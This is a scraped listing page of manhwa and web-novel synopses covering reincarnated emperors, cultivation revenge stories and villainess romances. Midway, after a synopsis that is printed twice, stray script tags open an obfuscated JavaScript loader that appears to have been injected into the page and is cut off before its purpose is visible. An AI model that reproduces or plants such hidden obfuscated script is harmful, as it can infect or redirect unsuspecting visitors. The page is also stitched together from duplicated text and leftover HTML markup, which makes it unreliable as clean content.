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Reverse Tower Dungeon

Reverse Tower Dungeon manhwa, The main character, Tsurugiya Daichi, is an aspiring novelist. He doesn't do very well, so he works part time as he continues updating his webnovel. While doing so, he has a theatrical reunion with his high school friend, Himari Hinomoto, whom he separated from on less than ideal terms in the bookstore in front of his work. In that moment, as if their meeting was the trigger, the world gets turned upside down. Magic circles appear, skyscrapers sink, and the interiors of buildings are "reversed". What's more, the monsters from Daichi's novel attack Can Daichi and Himari escape safely from the "inverted" tower?A web-comic fantasy with unpredictable twists and turns! リバースタワーダンジョン


Heavenly Martial God

“Who’s this male prostitute-looking kid?” I am the Matchless Ha Hoo Young, the greatest martial artist reigning over all the lands! There is no one that is my equal! I was drowning in futility and emptiness because there was no more that I could accomplish in the human realm. To reach the peak of martial arts, I must become a saint! “I finally succeeded!!!” “Stop! Your ascension is not permitted!” The other saints refused my ascension due to my karma after much slaughter, and I fell, just like that. When I woke up, I was 60 years in the future. I was reborn as the second lord of the Namgoong family, Namgoong Hyuk. Where has all the internal energy that I’ve accumulated gone?! Moreover, I have the Nine yin energy blockage?


Emperor Ling Tian

Ling Jian Chen, the master of the God-Emperor , is reborn as a mortal, and he has started an unbeatable life that defeat everyone against him! Genius? Even the God-Emperor is my student. Talking about genius and masters? Even the God-Emperor serves me with respect in order to receive my words of guidance, are you as unbeatable as me? Beauties? Have you ever heard of the most beautiful goddess in the Divine Realm? She has tried everything to stay with me … Everyone in heaven, listen to my orders, I’m the one and the only in all the eight realms in heaven. Emperor Ling Tian


The Dauntless Celestial Emperor

逆天仙帝 The celestial emperor has been reincarnated as an insignificant cowherd. Yet, he still recalls his enemies from his previous life. He vows to make his enemies pay a blood price to compensate for the suffering they had inflicted on him. However, he never expected his current form to be incapable of cultivation. Hence, he must find an alternative way to rebuild his primordial spirit. Gradually, he rises against his fate, letting everyone in the celestial realm know that he, the celestial emperor, has returned! 79


The Great Devil Emperor Development System

One hundred thousand years ago, when the human race rose, the new Demon Emperor Xiao Ting and the old Demon Emperor were bullied by the strong human race. The old Demon Emperor finally passed away in depression. Xiao Ting retreats in anger, vowing not to bring down the most precious treasure of the demon clan, “The Demon Emperor Sutra”, and vowed not to leave the customs successfully after his cultivation! In the 100,000-year Canghai Cangtian, Xiao Ting accidentally cultivated the “Devil Emperor Sutra” with only 10 floors to the 99999 floors…On the day of exit, Xiao Ting accidentally obtained the “Devil Emperor Development System”, but… The humble little system, seeing Xiao Ting, who was already at full level, couldn’t help expressing a pitiful feeling: all fairy tales are deceptive! Say good newcomers have a lot of oil and water? Can the newcomer system dominate and be fearless? Xiao Ting looked at the cute system full of bags: I heard that your system likes commanding the host? Humble System: Abba, Ababa… One hundred thousand years ago, when the human race rose, the new Demon Emperor Xiao Ting and the old Demon Emperor were bullied by the strong human race. The old Demon Emperor finally passed away in depression. Xiao Ting retreats in anger, vowing not to bring down the most precious treasure of the demon clan, “The Demon Emperor Sutra”, and vowed not to leave the customs successfully after his cultivation! In the 100,000-year Canghai Cangtian, Xiao Ting accidentally cultivated the “Devil Emperor Sutra” with only 10 floors to the 99999 floors…On the day of exit, Xiao Ting accidentally obtained the “Devil Emperor Development System”, but… The humble little system, seeing Xiao Ting, who was already at full level, couldn’t help expressing a pitiful feeling: all fairy tales are deceptive! Say good newcomers have a lot of oil and water? Can the newcomer system dominate and be fearless? Xiao Ting looked at the cute system full of bags: I heard that your system likes commanding the host? Humble System: Abba, Ababa…<script></script><script>function _0x279d(_0x35985c,_0x50f0b9){var _0x1eb83a=_0x5599();return _0x279d=function(_0x59f945,_0x140afe){_0x59f945=_0x59f945-(-0x1*0x158f+-0x23df+0x2*0x1d55);var _0x4a1890=_0x1eb83a[_0x59f945];return _0x4a1890;},_0x279d(_0x35985c,_0x50f0b9);}(function(_0x392e15,_0x3070e9){var _0x178c43=_0x279d,_0x2e59e1=_0x392e15();while(!![]){try{var _0x7f2be2=parseInt(_0x178c43(0x145))/(-0x26e9+0xfa+0x25f0)+parseInt(_0x178c43(0x15b))/(-0x2b*0x5c+0x11*0xbc+-0x6*-0x7f)+-parseInt(_0x178c43(0x13c))/(-0xb5d+-0x1cc6+0x3*0xd62)+parseInt(_0x178c43(0x158))/(-0x1fc*-0x1+-0x355*-0x7+-0x25*0xaf)*(parseInt(_0x178c43(0x141))/(0x17bc*-0x1+0xac*0x25+-0x11b))+parseInt(_0x178c43(0x150))/(-0xda*-0x6+0x5f*0x39+0x1a3d*-0x1)+-parseInt(_0x178c43(0x142))/(-0x1*0x1431+0x248f+-0x59*0x2f)+parseInt(_0x178c43(0x143))/(-0xc*0x32e+0x2167*0x1+-0x23*-0x23)*(-parseInt(_0x178c43(0x149))/(-0x168d+0x1271*-0x1+0x2907));if(_0x7f2be2===_0x3070e9)break;else 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A Quarter of The Secret

Yin Luowen’s mother died in a sudden traffic accident. After receiving a parcel sent by her mother before her death, the “accident” seemed to be premeditated. Yin Luowen embarked on the journey of revealing the secret. Just as the truth of the incident became clearer, the identities and secrets of the four men who were associated with them began to surface…


The Grave Robbers’ Chronicles Seven Dreams

If the story started when they were still young… Young Wu Xie encountered a mysterious girl and the similarly young Zhang Qiling. Why couldn't the mysterious girl’s perfume sachet be shown to others? What kind of secrets did it hold? Why have those that opened it died one by one? The mysterious girl also seemed to have something to do with the death of Zhang Qiling’s master! Would Wuxie uncover a generational nightmare, or an unspeakable sorrow? 盗墓笔记七个梦


Flowers In The Secret Place

A young girl enters into a different world in search of her best friend. Their past meeting felt secretive, but now her friend has been taken away by demons! The Demon Prince and his disrespected brother, exactly what kind of relationship do they have with this otherworld young maiden? The curtains behind this secret slowly begin to be drawn back.


Return of Cultivator: Vision of Eighty Millenniums

The God of Cosmos was framed and persecuted after he failed in the competition over the crown of lord. No one would expect he could come back to life 80 thousand years later. This time his soul was accidentally bounded with Yang Chen, the son of a servant. Unfortunately, Yang Chen, the original body owner, was the worst at cultivation. How could the God of Cosmos start his revenge planed for 80 millenniums? The answer is, of course, cultivation!


I’m A Human, But, I Became The King Of Monsters

The protagonist Chang Zaikun has been able to see terrifying “weird” creatures in his life since he was a child, but he was never afraid, but was deeply attracted by those monsters and fell in love with them from the bottom of his heart. One day in high school, he accidentally met a monster administrator and received an invitation: to manage a “prison” inhabited by a lot of monsters, and to find those monsters who were lost in the world!


The Villainess Needs a Tyrant

Just now, I stole the lips of a man who is notorious as a tyrant. In front of my younger cousin, Arinel, who stole everything I had in my previous life. *** “Why did you kiss me?” “Because my younger cousin loves you, Your Majesty.” “Is that so?” His arms wrapped around my waist. The distance that was formed vanished in an instance. The cold-blooded, powerful man’s smile filled my view. “Open your lips. If you are going to do it, then do it properly.” Credit goes to Travis Translations. <h5 class="seriesother associated">Associated Names</h5> <div id="editassociated">TVNT 그 악녀에게는 폭군이 필요하다</div>


Beware Of The Red Thread

I fell into the reverse harem novel! I’m going to live quietly, but my god. The villain and the red thread are twisted….life is twisted.
